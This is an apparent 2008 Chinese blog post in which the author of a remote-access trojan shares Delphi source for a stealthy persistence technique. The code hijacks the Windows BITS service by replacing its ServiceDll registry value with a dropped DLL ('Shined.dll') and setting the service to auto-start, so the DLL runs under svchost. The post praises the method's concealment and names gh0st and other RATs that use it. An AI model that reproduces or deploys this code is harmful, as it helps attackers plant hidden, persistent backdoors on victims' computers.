建立svchost.exe启动的服务现在貌似很流行,黑洞,gh0st和我们小组的远控都是这种方式,主要是隐蔽性高。我发出来替换服务的方式添加,现在VB版的正在写,就是遇到了点问题,比较恶心,很快就能解决,写完了第一时间发出来!
DELPHI代码如下:
{安装单元
完成进度:服务安装
日期:2008,9,16
作者:Lenk(L.S.T)}
unit Unt_Install;
interface
Uses Windows,WinSvc,WinSvcEx,Unt_Const;
procedure Install;stdcall;
const
SrvName='BITS';
implementation
procedure Install;
var
DllPath:String;
begin
DllPath:=SystemDir+'Shined.dll';
if FileExists(DllPath) then
begin
ConfigServiceEx(SrvName, SERVICE_DISABLED);
StartServiceEx(nil,SrvName,False);
SetStrToReg(HKEY_LOCAL_MACHINE, 'SYSTEM\CurrentControlSet\Services\BITS\Parameters', 'ServiceDll', Pchar(DLLPath));
SetStrToReg(HKEY_LOCAL_MACHINE, 'SYSTEM\ControlSet003\Services\BITS\Parameters', 'ServiceDll', Pchar(DLLPath));
ConfigServiceEx(SrvName, SERVICE_AUTO_START);
StartServiceEx(nil, SrvName, True);
end;
end;
end.
看这个就能理解是什么意思了,VB版的也写完了
http://fenlog.com/post/46.html
谢谢大家支持!~
2008/11/19 | Tags:编程,转载文章 | 其他代码 | 查看评论(2)